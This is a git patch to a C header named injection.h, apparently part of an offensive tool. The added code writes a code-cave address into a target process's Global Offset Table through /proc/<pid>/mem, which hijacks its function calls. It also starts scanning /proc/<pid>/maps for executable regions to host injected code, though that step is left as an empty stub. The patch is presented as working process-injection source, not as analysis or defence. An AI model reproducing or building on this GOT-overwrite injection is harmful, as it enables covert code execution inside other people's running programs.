From f4b88668b87448d58d680095d9f1f841bcae2840 Mon Sep 17 00:00:00 2001
From: h3xduck <marcossanchezbajo@gmail.com>
Date: Thu, 7 Apr 2022 07:10:00 -0400
Subject: [PATCH] Finished GOT section identification and writing, added
 parsing of /proc/<pid>/maps

---
 src/user/include/utils/mem/injection.h | 35 ++++++++++++++++++++++----
 1 file changed, 30 insertions(+), 5 deletions(-)

diff --git a/src/user/include/utils/mem/injection.h b/src/user/include/utils/mem/injection.h
index 596e9b3..03c0e42 100644
--- a/src/user/include/utils/mem/injection.h
+++ b/src/user/include/utils/mem/injection.h
@@ -10,9 +10,11 @@
 #include "../common/constants.h"
 #include "../common/map_common.h"
 
+#include "code_caver.h"
+
 int manage_injection(const struct rb_event* event){
     char mem_file_name[100];
-    char *buf="AAAAAAAAAAAAA";
+    __u64 buf = (__u64)CODE_CAVE_ADDRESS;
     int mem_fd;
 
 
@@ -24,12 +26,35 @@ int manage_injection(const struct rb_event* event){
     mem_fd = open(mem_file_name, O_RDWR);
     lseek(mem_fd, event->got_address, SEEK_SET);
 
-    for(int ii=0; ii<8; ii++){
-        if(write(mem_fd, buf, 1) < 0 ){
-            perror("Writing");
+    for(int ii=0; ii<sizeof(__u64); ii++){
+        if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
+            perror("Error while writing at GOT");
+            return -1;
         }
     }
-    
+
+    //Parsing /proc/pid/maps.
+    //Note that addresses usually appear as 32-bit when catting, but this is not completely true
+    //
+    char *maps_file = calloc(512, sizeof(char));
+    FILE *f;
+    sprintf(maps_file, "/proc/%d/maps", event->pid);
+    f = fopen(maps_file, "rt");
+    while (fgets(maps_file, 512, f)) {
+        __u32 pgoff, major, minor;
+        __u64 from, to, ino;
+        char flags[4];
+        int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino);
+        printf("MAPS: %s\n", maps_file);
+
+        //Parse flags, find executable one
+        if(flags[2] == 'x'){
+            //Candidate for code cave finding
+            
+        }
+    }
+
+    free(maps_file);
 
     return 0;
 }